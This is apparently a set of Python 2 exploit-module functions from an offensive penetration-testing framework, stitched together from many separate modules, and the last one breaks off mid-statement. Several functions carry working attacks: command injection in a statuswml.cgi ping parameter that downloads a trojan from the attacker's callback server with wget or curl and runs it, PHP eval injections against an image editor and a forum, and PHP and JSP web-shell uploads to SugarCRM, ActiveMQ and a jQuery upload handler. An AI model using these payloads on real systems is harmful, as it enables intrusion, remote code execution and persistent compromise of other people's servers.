def setup_UA(self, url): """ Setup everything needed to do requests using spkproxy """ if self.auth_user and self.auth_password: self.log("Using %s auth (User: %s - Password: %s)" % (self.auth_type, self.auth_user, self.auth_password)) if self.auth_type == "BASIC": auth = spkproxy.BasicAuth(self.auth_user, self.auth_password) else: #NTLM domain = "" user = self.auth_user if "\\" in self.auth_user: domain, user = self.auth_user.split("\\") print "domain =", domain, " - user="******"X-Vermeer-Content-Type", "application/x-vermeer-urlencoded") ua.addHeader("Content-Type", "application/x-vermeer-urlencoded") return ua
def send_jboss_request(self, payload=None): if not self.hostname: self.hostname = self.host self.log("Attacking %s:%d" % (self.hostname, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) #setup our UA first if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None targetstring = protocol + "://" + self.hostname + ":" + str(self.port) + self.basepath self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) host_field = "%s:%s" % (self.hostname, self.port) self.ua.addHeader("Host", host_field) data = None if payload != None: data = self.ua.POST(self.targetpath, payload, extraheaders=None, noresponse=True) else: data = self.ua.GET(self.targetpath, noresponse=False) return data
def send_initial_request(self): auth = None if self.basicauth: logging.debug('Using basic auth {}:{}'.format( self.basicauth_user, self.basicauth_password)) auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) url = 'https' if self.https else 'http' url += '://' + self.host url += ':' + str(self.port) url += self.path url += '/CFIDE/wizards/common/utils.cfc' postdata = 'method=verifyldapserver&vusername=&vpassword=&vserver=' postdata += self.ldap_ip postdata += '&vport=' postdata += str(self.ldap_port) postdata += '&vstart=ou%3dmosdef%2cdc%3dexample%2cdc%3dorg' logging.info('Sending initial request') ua = spkproxy.UserAgent(url, exploit=self, auth=auth, hostname=self.host) ua.addHeader("Content-Type", "application/x-www-form-urlencoded") ua.POST("", postdata, [], noresponse=False) logging.info('Sent')
def send_struts_request(self, header, testing=False): protocol = "https" if self.ssl else "http" auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) if self.basicauth_user else None host_name = self.host if self.vhost: host_name = self.vhost host_string = ("%s:%d" % (self.host, self.port)) if self.port != 80 else host_name target_string = "%s://%s" % (protocol, host_string) logging.info("connecting to: %s" % (target_string)) self.ua = spkproxy.UserAgent(target_string, auth=auth, hostname=host_name, exploit=self) for (key, value) in header.iteritems(): self.ua.addHeader(key, value) self.ua.addHeader("Host", host_string) self.ua.addHeader("Connection", "close") self.ua.addHeader("Accept-Encoding","identity") self.ua.addHeader("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36") kwargs = None (response, response_code) = (None, None) descriptor = self.ua.GET("/%s" % (self.basepath), noresponse=True) return descriptor
def test_vuln(self, vhosts): if self.ssl: protocol = "https" else: protocol = "http" if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None request = self.basepath + '?-s' ret = [] for host in vhosts: try: data = spkproxy.urlopen(protocol + '://' + self.host + ":%s" % self.port + request, hostname=host, exploit=self, auth=auth).read() if data.lower().startswith("<code>"): ret.append(host) except Exception: import traceback self.log(traceback.format_exc(5)) return ret
def deploy_war(self): auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) target = '%s/management/domain/applications/application' % self.url ua = spkproxy.UserAgent(target, auth=auth, exploit=self) ua.addHeader('Accept', 'application/json') ua.addHeader('X-Requested-By', 'dummy') data = "id=%s&force=true" % self.pathwar response = ua.POST("", data) return response
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port)) if self.version==0: ret=self.test() if not ret: self.log("Testing didn't find vulnerable target") return 0 self.log("Attacking %s:%d"%(self.host,self.port)) self.log("Basic Auth User: %s"%self.basicauth_user) self.log("VHost: %s"%self.hostname) if self.ssl: protocol="https" else: protocol="http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password) else: auth=None UA=spkproxy.UserAgent(protocol+"://"+self.host+"/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self) if self.command: self.log("Command: %s"%self.command) command=self.command command="print(startz);passthru('"+command+"');print(endz);" data = UA.POST("picEditor.php", "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;") data = UA.GET("albums/edit/index.php?c=%s"%(urllib.quote_plus(command))) if "startz" in data: result=data.split("startz")[1].split("endz")[0] #self.log("Command data: %s"%prettyprint(data)) self.log("Command result=%s"%prettyprint(result)) ret=1 else: self.log("Command not run - service patched?!") else: command=self.get_php_to_mosdef().strip() command=command.replace("/","`pwd|cut -b1`") self.log("Command: %s"%command) self.log("Sending Exploit") data = UA.POST("picEditor.php", "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;") data = UA.GET("albums/edit/index.php?c=%s"%(urllib.quote_plus(command))) self.log("Data=%s"%data) self.log("Looking for PHP connectback") ret=self.ISucceeded() if ret: self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port)) return ret
def check(self): """ Quicky banner check - looks for RomPager version. """ self.getargs() self.log("Using basepath=%s" % self.basepath) self.log("Using vhost=%s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" for hostname in self.allhosts: self.log("Testing hostname: %s" % hostname) self.log("Testing for RomPager version") #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None #setting up spkproxy fd = spkproxy.urlopen(protocol + "://" + self.host + ":%s" % self.port + "/Allegro", hostname=hostname, exploit=self, auth=auth) data = fd.read() #now that we have the web page - we parse it and look for vulnerable versions #versions below 4.34 are assumed vulnerable. for s in ["RomPager Advanced Version 4.07"]: if s in data: self.log_info( "Detected vulnerable and supported RomPager version on %s " % (hostname)) #self.argsDict["basepath"]=basepath #self.basepath=basepath self.hostname = hostname self.version = 1 #self.log_debug("Response:%s"%data) return 1 else: for s in ["RomPager"]: if s in data: self.log_info( "Unsupported version of RomPager was detected." ) self.log_debug("Response: %s" % data) return 0 else: self.log_info("Target is not running RomPager.") #self.log_debug("Response: %s"%data) return 0 return 0
def get_jenkins_info(self): if not self.hostname: self.hostname = self.host self.log("Attacking %s:%d" % (self.hostname, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) #setup our UA first if self.ssl: protocol = "https" else: protocol = "http" if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None targetstring = protocol + "://" + self.hostname + ":" + str( self.port) + self.basepath host_field = "%s:%s" % (self.hostname, self.port) self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) self.ua.addHeader("Host", host_field) (response, response_code) = self.ua.GET(self.targetpath, noresponse=False, entireresponse=True, return_response_code=True) version = self.extract_regex_result(response, self.version_re, "version") if self.version_test(version): return_value = None if 299 < response_code or response_code < 200: pass else: for line in response.split("\r\n"): if "X-Jenkins-CLI-Port" in line: field = line.split(":") return_value = int(field[1]) break return return_value else: return None
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port)) if self.version==0: ret=self.test() if not ret: self.log("Testing didn't find vulnerable target") return 0 self.log("Attacking %s:%d"%(self.host,self.port)) self.log("Basic Auth User: %s"%self.basicauth_user) self.log("VHost: %s"%self.hostname) if self.ssl: protocol="https" else: protocol="http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password) else: auth=None UA=spkproxy.UserAgent(protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self) if self.command: self.log("Command: %s"%self.command) command=self.command command="print '---1243---\n';passthru(\'"+command+"');print '---3421---\n'; ".strip() data = UA.GET("viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"%(urllib.quote_plus(command))) if "---1243---" in data: result=data.split("1243---")[1].split("---3421")[0] self.log("Command data: %s"%prettyprint(data)) self.log("Command result=%s"%prettyprint(result)) ret=1 else: self.log("Command not run - service patched?!") else: command=self.get_php_to_mosdef().strip() command=command.replace("/","`pwd|cut -b1`") self.log("Command: %s"%command) data = UA.GET("viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"%(urllib.quote_plus(command))) self.log("Looking for PHP connectback") ret=self.ISucceeded() if ret: self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port)) return ret
def setup_UA(self, url=""): """ Setup everything needed to do requests using spkproxy """ #If we have to do basic-auth, let's get an object from spkproxy here if self.username and self.password: auth = spkproxy.BasicAuth(self.username, self.password) self.log("Using BasicAuth (User: %s - Password: %s)" % (self.username, self.password)) else: auth = None ua = spkproxy.UserAgent(url, auth=auth, hostname=self.host, exploit=self) return ua
def test(self): """ Quicky banner check - looks for comon basepaths """ self.getargs() self.log("Using basepath=%s" % self.basepath) self.log("Using vhost=%s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" for hostname in self.allhosts: self.log("Testing hostname: %s" % hostname) #automatically check out some common basepaths, starting with the one specified for basepath in [ self.basepath, "/punn/upload/", "/punbb/", "/PunBB/", "/board/", "/forum/", "/upload/", "/" ]: self.log("Testing for basepath: %s" % basepath) #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None #this is the main call that does the magic here... fd = spkproxy.urlopen(protocol + "://" + self.host + ':%s' % self.port + "/" + basepath, hostname=hostname, exploit=self, auth=auth) data = fd.read() #now that we have the web page - we parse it and look for vulnerable versions #list of vulnerable versions so far for s in ["PunBB"]: #self.log("Data=%s"%data) #print out web page (big) if s in data: self.log( "Found Potential vulnerable PunBB in vhost %s at basepath %s" % (hostname, basepath)) self.argsDict["basepath"] = basepath self.basepath = basepath self.hostname = hostname self.version = 1 return 1 return 0
def setup_UA(self): """ Setup everything needed to do requests using spkproxy """ if self.basicauth_user and self.basicauth_password: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) logging.info("Using BasicAuth (User: %s - Password: %s)" % (self.basicauth_user, self.basicauth_password)) else: auth = None ua = spkproxy.UserAgent(self.base_url, auth=auth, hostname=self.hostname, exploit=self) #ua = spkproxy.UserAgent(self.base_url, auth=auth, hostname=self.hostname, exploit=self, proxyhost="localhost", proxyport=8080) return ua
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.hostname,self.port)) self.log("Attacking %s:%d"%(self.hostname,self.port)) self.log("Basic Auth User: %s"%self.basicauth_user) self.log("VHost: %s"%self.hostname) if self.ssl: protocol="https" else: protocol="http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user !="": auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password) else: auth=None useragentstring=protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath self.log("useragentstring: %s"%useragentstring) UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self) t = threading.Thread(target=self.set_up_webserver) t.setDaemon(True) t.start() response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;wget%%20-O%%20/tmp/%s%%20http://%s:%s/index.html"""%(self.trojanname, self.callback.ip, self.webserverport), noresponse=False) response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;chmod%%20777%%20/tmp/%s;/tmp/%s"""%(self.trojanname, self.trojanname), noresponse=True) time.sleep(5) if self.ISucceeded(): self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port)) return 1 else: print "wget attempt failed - retrying with curl" response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;curl%%20-o%%20/tmp/%s%%20http://%s:%s/index.html"""%(self.trojanname, self.callback.ip, self.webserverport), noresponse=False) response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;chmod%%20777%%20/tmp/%s;/tmp/%s"""%(self.trojanname, self.trojanname), noresponse=True) time.sleep(5) if self.ISucceeded(): self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port)) return 1 else: self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port)) return 0
def setup_UA(self, url): """ Setup everything needed to do requests using spkproxy """ if self.basicauth_user and self.basicauth_password: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) self.log("Using BasicAuth (User: %s - Password: %s)" % (self.basicauth_user, self.basicauth_password)) else: auth = None ua = spkproxy.UserAgent(url, auth=auth, hostname=self.hostname, exploit=self) return ua
def test(self): """ Quicky banner check - looks for comon basepaths """ self.getargs() self.log("Using basepath=%s"%self.basepath) self.log("Using vhost=%s"%self.hostname) self.log("Using Testfile=%s"%self.testfile) if self.ssl: protocol = "https" else: protocol = "http" for hostname in self.allhosts: self.log("Testing hostname: %s"%hostname) #automatically check out some common basepaths, starting with the one specified for basepath in self.basepaths: self.log("Testing for basepath: %s"%basepath) #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password) else: auth = None #this is the main call that does the magic here... fd = spkproxy.urlopen(protocol+"://"+self.host+':%s'%self.port+basepath+self.testfile, hostname=hostname, exploit=self, auth=auth, extraheaders=[("User-Agent","Mozilla/4.0 (compatible; MSIE 5.0; Windows NT;)")]) data = fd.read() #now that we have the web page - we parse it and look for vulnerable versions #list of vulnerable versions so far for s in self.foundstrings: devlog("phpexploit","Data=%s"%data) #print out web page (big) if s in data: self.log("Found Potential vulnerable php app in vhost %s at basepath %s"%(hostname, basepath)) self.argsDict["basepath"] = basepath self.basepath = basepath self.hostname = hostname self.version = 1 return 1 return 0
def setup_UA(self): self.getargs() if self.ssl: protocol="https" else: protocol="http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user !="": auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password) else: auth=None useragentstring=protocol+"://"+self.host+":%s"%self.port+"/" self.log("useragentstring: %s"%useragentstring) self.UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self)
def test(self): self.getargs() if not self.hostname: self.hostname = self.host self.log("Attacking %s:%d" % (self.hostname, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) #setup our UA first if self.ssl: protocol = "https" else: protocol = "http" if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None targetstring = protocol + "://" + self.hostname + ":" + str( self.port) + self.basepath host_field = "%s:%s" % (self.hostname, self.port) self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) self.ua.addHeader("Host", host_field) (response, response_code) = self.ua.GET(self.targetpath, noresponse=False, entireresponse=True, return_response_code=True) version = self.extract_regex_result(response, self.version_re, "version") return self.version_test(version)
def send_request(self, data, no_response=True): auth = None req_header = spkproxy.header() req_header.connectHost = self.target.interface req_header.connectPort = self.port req_header.URL = "/" req_header.verb = "PROPFIND" req_header.addHeader("Content-Length", "0") req_header.addHeader("Host", self.host) req_header.addHeader("If", data) req_header.setSurpressContentLength() req_body = spkproxy.body() ntlm_info = ["","",""] #NTLM user / password / domain proxy_info = ["", 0, "", 0] if self.auth_type == "basic": auth = spkproxy.BasicAuth(self.auth_user, self.auth_password) auth.getHeader(req_header) elif self.auth_type == "ntlm": ntlm_info = [self.auth_user, self.auth_password, self.auth_domain] if self.proxy_port is not None: proxy_info = [self.proxy_host, self.proxy_port, self.proxy_host, self.proxy_port] con = spkproxy.spkProxyConnection(None, None, proxy=proxy_info, ntlm=ntlm_info) con.gettcpsock = self.gettcpsock if self.ssl: con.clientisSSL = 1 if no_response: con.sendRequest(req_header, req_body, noresponse=no_response) else: x = con.sendRequest(req_header, req_body, noresponse=no_response) return x
def test(self): self.getargs() auth = None req_header = spkproxy.header() req_header.connectHost = self.target.interface req_header.connectPort = self.port req_header.URL = "/" req_header.verb = "OPTIONS" req_header.addHeader("Host", self.host) req_body = spkproxy.body() ntlm_info = ["","",""] #NTLM user / password / domain proxy_info = ["", 0, "", 0] if self.auth_type == "basic": auth = spkproxy.BasicAuth(self.auth_user, self.auth_password) auth.getHeader(req_header) elif self.auth_type == "ntlm": ntlm_info = [self.auth_user, self.auth_password, self.auth_domain] if self.proxy_port is not None: proxy_info = [self.proxy_host, self.proxy_port, self.proxy_host, self.proxy_port] con = spkproxy.spkProxyConnection(None, None, proxy=proxy_info, ntlm=ntlm_info) con.gettcpsock = self.gettcpsock if self.ssl: con.clientisSSL = 1 logging.info("sending header request") response = con.sendRequest(req_header, req_body, noresponse=False) if isinstance(response, str): return int("Server: Microsoft-IIS/6.0" in response and "MS-Author-Via: DAV" in response) else: return 0
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log("Attacking %s:%d" % (self.host, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #port=self.port #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None #UA=spkproxy.UserAgent(protocol+"://"+self.host+":8088/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self) UA = spkproxy.UserAgent(protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath, auth=auth, hostname=self.hostname, exploit=self) data = UA.GET("%s%s%%00.txt" % (self.basepath, self.command)) self.log("Source=%s" % data) #ret=self.ISucceeded() # #if ret: # self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port)) #else: # self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port)) #return ret self.log("Check CANVAS log in next tab for page source")
def setup_UA(self, url="", add_trail_slash=False): """ Setup everything needed to do requests using spkproxy """ #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user and self.basicauth_password: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) self.log("Using BasicAuth (User: %s - Password: %s)" % (self.basicauth_user, self.basicauth_password)) else: auth = None self.log("HtmlAdaptor servlet url: %s" % self.htmladaptor_url) if not url: url = self.htmladaptor_url + "/" if add_trail_slash else self.htmladaptor_url self.log("Setting spkproxy.UserAgent with url: %s" % url) ua = spkproxy.UserAgent(url, auth=auth, hostname=self.hostname, exploit=self) return ua
def send_activemq_request(self): if not self.hostname: self.hostname = self.host self.log('[D2] Attacking %s:%d' % (self.hostname, self.port)) self.log('[D2] Basic Auth User: %s' % self.basicauth_user) self.log('[D2] VHost: %s' % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" # directory traversal self.log('[D2] Exploit Directory Traversal Vulnerability') auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_pass) host_field = "%s:%s" % (self.hostname, self.port) targetstring = protocol + "://" + self.hostname + ":" + str( self.port) + self.basepath self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) self.ua.addHeader("Host", host_field) data = open(self.filejsp, 'r').read() self.ua.PUT('', data, noresponse=True) # request mosdef jsp script self.log('[D2] Request uploaded mosdef JSP script') targetstring = protocol + "://" + self.hostname + ":" + str( self.port) + '/admin/d2.jsp' self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) self.ua.addHeader("Host", host_field) data = self.ua.GET('')
def test(self): self.getargs() if not self.hostname: self.hostname = self.host self.log("Checking %s:%d" % (self.hostname, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None targetstring = "https://" + self.hostname + ":" + str( self.port) + "/vco/api/about" self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) host_field = "%s:%s" % (self.hostname, self.port) self.ua.addHeader("host", host_field) data = None data = self.ua.GET(self.targetpath, noresponse=False) self.log("got response:%s from /vco/api/about" % data) data = json.loads(data) version_string = self.extract_regex_result(data["version"], self.version_re, "version") return int(version_string <= "6.0.1.2490144")
def is_vulnerable(self): status = False if self.basicauth_user: self.auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: self.auth = None if self.cookies: self.extraheaders = [("Cookie", self.cookies)] #Test GET request tag = "RENDER-TEST-INJECTION" param_name = self.param + "[inline]" params = { param_name : tag } if self.moreparams: params = self.add_params(params, self.moreparams) urlencoded_params = urllib.urlencode(params) request = self.basepath + "?" + urlencoded_params target = self.host if self.vhost: target = self.vhost url = self.protocol + '://' + target + ":%s" % self.port + request (res, responsecode) = spkproxy.urlopen(url, extraheaders=self.extraheaders, data="", exploit=self, entireresponse=True, return_response_code=True, auth=self.auth,verb="GET") response = res.read() if responsecode == 200 : if tag in response: status = True self.vulnerable_target = target if responsecode == 401 : if "WWW-Authenticate: Basic realm" in response: raise ValueError("Authentication Failed - Basic Realm detected: check username & password and try it again") else: raise ValueError("Authentication Failed - Not Basic Realm") return status
def do_url_connect(self, host_info, proxy=None): """ do basic http auth if needed .. connect to url """ # ssl flag toggles to https if host_info['ssl']: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if host_info['user']: auth = spkproxy.BasicAuth(host_info['user'], host_info['password']) else: auth = None if not proxy: UA = spkproxy.UserAgent(protocol+"://"+host_info['host']+':%s'% host_info['port']+"/"+host_info['basepath'], \ auth=auth, hostname=host_info['hostname'], exploit=self) else: self.log("Using web proxy: %s" % proxy) UA = spkproxy.UserAgent(protocol+"://"+host_info['host']+':%s'% host_info['port']+"/"+host_info['basepath'], \ auth=auth, hostname=host_info['hostname'], exploit=self, \ proxyhost=proxy.split(':')[0], proxyport=int(proxy.split(':')[1])) return UA
def run(self): self.getargs() test = self.test() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.hostname, self.port)) self.log("Attacking %s:%d" % (self.hostname, self.port)) #self.log("Basic Auth User: %s"%self.basicauth_user) self.log("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user != "": auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath self.log("useragentstring: %s" % useragentstring) UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self) response = UA.POST( self.loginpage, "module=Users&action=Authenticate&return_module=Users&return_action=Login&cant_login=&login_module=&login_action=&login_record=&user_name=%s&user_password=%s&login_theme=Sugar&login_language=en_us&Login=++Login++" % (self.username, self.password), noresponse=False) #self.log("AFTER LOGIN %s"%response) #if the user has not assigned a valid timezone in which they reside then we can't continue to get a userid #if "action=SetTimezone" in response: #self.log("setting time zone for %s"%self.username) response = UA.POST( self.timezonepage, "record=&module=Users&action=SaveTimezone&SaveTimezone=true&timezone=America%2FNew_York&button=++Save++" ) #self.log(response) #find out what are assigned userid is #<a href="index.php?module=Emails&action=ListView&assigned_user_id=abf7c77b-2f71-8071-63ba-4a131068e9a2&type=archived"> #not very pretty - but it works! response = UA.GET(self.composemailpage) #self.log(response) try: userid = response.split("assigned_user_id=")[1].split("&")[0] self.log("Assigned User-Id: %s" % userid) except: self.log( "Couldn't determine our assigned_user_id - make sure we are connecting to the correct SugarCRM host!" ) return 0 #push our file up UA.addHeader( "Content-Type", "multipart/form-data; boundary=---------------------------3922242971797626524322043819" ) response = UA.POST(self.composemailpage, self.getfile()) #self.log(response) #{"guid":"c7e4746b-bba6-6dfd-7a2b-4a3977a03f0d","name":".php","nameForDisplay":".php"} try: prefix = response.split(",")[0].split(":")[1].strip("\"") ourphpfilename = prefix + ".php" self.log("our remote filename: %s" % ourphpfilename) except: self.log( "Couldn't determine our remote filename - make sure we are connecting to the correct SugarCRM host!" ) return 0 ourfile = self.pathtoourfile + "//" + userid + "//" + ourphpfilename self.log("Path to our file: %s" % ourfile) #execute our file! UA.clearHeaders() response = UA.GET(ourfile, noresponse=True) for i in xrange(0, 3): #wait three seconds for callback time.sleep(1) ret = self.ISucceeded() if ret: break if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
def run(self): for node in self.argsDict['passednodes']: self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.host, self.port)) self.log_info("Using version: %s" % self.version) ret = self.check() self.setProgress(30) if not ret: self.setInfo( "%s against %s:%d (failed: didn't find vulnerable target!)" % (NAME, self.host, self.port)) self.log_info("Testing didn't find vulnerable target") return 0 self.log_info("Attacking %s:%d" % (self.host, self.port)) #self.log("Basic Auth User: %s"%self.basicauth_user) #self.log("VHost: %s"%self.hostname) if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None requestString = protocol + "://" + self.host + ":%s" % self.port + self.basepath self.log("RequestString: %s" % requestString) UA = spkproxy.UserAgent(requestString, auth=auth, hostname=self.hostname, exploit=self) UA.SetCookie( self.magicCookie_name, self.magicCookie_val) # to clear the authentigation flag. self.log("Cookie: " + self.magicCookie_name + "=" + self.magicCookie_val) self.setProgress(50) # To-do: Handle enable/disable separatedly # #UA.SetCookie(self.magicCookie_name,self.magicCookie_val+1) # to restore authentication flag. #self.log("Cookie: "+self.magicCookie_name+"="+self.magicCookie_val) data = UA.GET("") self.setProgress(70) if "status/status_deviceinfo" in data: self.log("Authentication successfully disabled!") self.log("You can now access web interface without password.") self.setProgress(100) ret = 1 else: if "Protected Object" in data: self.log("Exploit did not work. Wrong offsets?") ret = 0 if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret
def run(self): self.getargs() self.setInfo("%s attacking %s:%d (in progress)" % (self.name, self.host, self.port)) self.log("Using version: %s" % self.version) if self.version == 0: ret = self.test() if not ret: self.setInfo( "%s against %s:%d (failed: didn't find vulnerable target!)" % (self.name, self.host, self.port)) self.log("Testing didn't find vulnerable target") return 0 if not self.hostname: self.hostname = self.host self.log("Attacking %s:%d" % (self.host, self.port)) self.log("Basic Auth User: %s" % self.basicauth_user) self.log("VHost: %s" % self.hostname) #setup our UA first if self.ssl: protocol = "https" else: protocol = "http" #If we have to do basic-auth, let's get an object from spkproxy here if self.basicauth_user: auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) else: auth = None targetstring = protocol + "://" + self.hostname + ":" + str( self.port) + self.basepath self.log("Targetstring: %s" % targetstring) self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self) if hasattr(self, "content_type"): self.ua.addHeader("Content-Type", self.content_type) if self.webserverport: self.set_up_webserver() noresponse = True noresponse = True if self.command: #we do get the response if we are sending it a command noresponse = False if self.verb == "POST": body = self.getbody() self.log("POSTING data of length %s" % len(body)) data = self.ua.POST( self.targetpath, body, noresponse=noresponse ) #fix noresponce in POST noresponse=noresponse elif self.verb == "GET": data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(), noresponse=noresponse) if self.command and data: blah = self.parse_command_response(data) if self.webserverport: #let's accept a connection if this is an RFI exploit #we should have timed out on the top connection ret = self.server.accept() if ret: self.log("Found callback to our web server: %s!" % ret) else: self.log("Recved result of: %s" % data) ret = self.ISucceeded() return ret
def run(self): self.getargs() #test = self.test() self.setInfo("%s attacking %s:%d (in progress)" % (NAME, self.hostname, self.port)) logging.info("Attacking %s:%d" % (self.hostname, self.port)) logging.info("VHost: %s" % self.hostname) if self.ssl: protocol = "https" else: protocol = "http" auth = None if self.basicauth_user != "": auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) fname_shell = randomstring( 16 ) + ".php" #''.join(random.choice(string.ascii_letters) for _ in range(16)) # fname_multipart_data = self.getfile(fname_shell) found_path = False useragentstring = '' vulnerable_path = '' for jquery_path in self.jquery_paths: useragentstring = protocol + "://" + self.host + ":" + str( self.port) + "/" + self.basepath UA = spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self) for vulpath in self.vulnpaths: UA.addHeader( "Content-Type", "multipart/form-data; boundary=---------------------------3922242971797626524322043819" ) vulnerable_path = jquery_path + vulpath logging.info( "Checking for vulnerable path: {}".format(useragentstring + vulnerable_path)) response, response_code = UA.POST(vulnerable_path, fname_multipart_data, return_response_code=True) if response_code == 200: found_path = True break vulnerable_path = jquery_path + vulpath + "/" + randomstring( 10) logging.info( "Checking for vulnerable path: {}".format(useragentstring + vulnerable_path)) response, response_code = UA.POST(vulnerable_path, fname_multipart_data, return_response_code=True) if response_code == 200: found_path = True break if found_path: logging.warning( "Found vulnerable path: {}".format(useragentstring + vulnerable_path)) break # Wait for the upload time.sleep(3) ret 